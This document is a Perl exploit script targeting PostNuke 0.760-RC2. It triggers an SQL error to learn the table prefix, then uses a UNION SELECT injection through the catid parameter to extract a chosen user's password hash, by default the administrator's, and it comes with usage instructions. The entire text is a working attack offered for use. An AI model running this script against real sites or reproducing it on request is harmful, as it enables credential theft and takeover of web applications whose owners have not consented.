Exploit Code :  

#!/usr/bin/perl
use IO::Socket;

# SecurityReason.com TEAM
# Maksymilian Arciemowicz ( cXIb8O3 ) cxib@securtiyreason.com
#
# GPG http://securityreason.com/gpg/key.pgp
# Ctitical SQL INCJECTION
# POSTNUKE 0.760-RC2=>x
#
#
# thx sp3x,nagash(from T-NAS),ladyBMS
# SecurityReason.com

if (@ARGV < 3)
{
print "\r\n SecurityReason TEAM\r\n";
print "[cXIb8O3] EXPLOIT for PostNuke 0.760-RC2=>x\r\n";
print " \r\n";
print "perl pn-0760RC2-cXIb8O3.pl HOST /DIR/ USER_ID\r\n\r\n";
print "HOST - Host where is postnuke example: http://localhost\r\n";
print "DIR - Directory to PN example:
/PostNuke-0.760-RC2/html/\r\n";
print "UID - standart Admin=2\r\n\r\n";
print "example cmd: perl pn-0760RC2-cXIb8O3.pl http://localhost /html/
2\r\n\r\n";
exit();
}

$HOST = $ARGV[0];
$DIR = $ARGV[1];
$UID = $ARGV[2];
print "\r\nATTACK HOST IS: ".$HOST."\r\n\r\n";
$HOST =~ s/(http:\/\/)//;

$path .= $DIR;
$path .= "index.php?catid='cXIb8O3";

$get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST",
PeerPort => "80") || die "Error 404\r\n\r\n";

print $get1 "GET $path HTTP/1.1\r\n";
print $get1 "Host: $HOST\r\n";


print $get1 "Accept: */*\r\n";
print $get1 "Connection: close\r\n\r\n";

while ($odp = <$get1>)
{ if ($odp =~ /ORDER BY (.*)stories.pn_time/) {
$exploit .= $DIR;
$exploit .=
"index.php?catid=-99999%20UNION%20SELECT%20pn_uname,pn_uname,pn_uname,pn
_uname,pn_uname,null,null,null,pn_uname,pn_uname,pn_uname,pn_uname,pn_un
ame,null,pn_pass,null,null,null,null,null,null%20FROM%20";
$exploit .= $1;
$exploit .= "users%20WHERE%20pn_uid=";
$exploit .= $UID;
$exploit .= "/* ";

print "\r\nDB PREFIX IS: ".$1."\r\n\r\n";

$get2 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST",
PeerPort => "80") || die "Error 404\r\n\r\n";

print $get2 "GET $exploit HTTP/1.1\r\n";
print $get2 "Host: $HOST\r\n";


print $get2 "Accept: */*\r\n";
print $get2 "Connection: close\r\n\r\n";

while ($odpi = <$get2>)
{
if ($odpi =~ /0">([0-9a-f]{32})<\/a>/ ) {
printf "Password for a user with id ".$UID." is ".$1."\r\n\r\n";
}}}}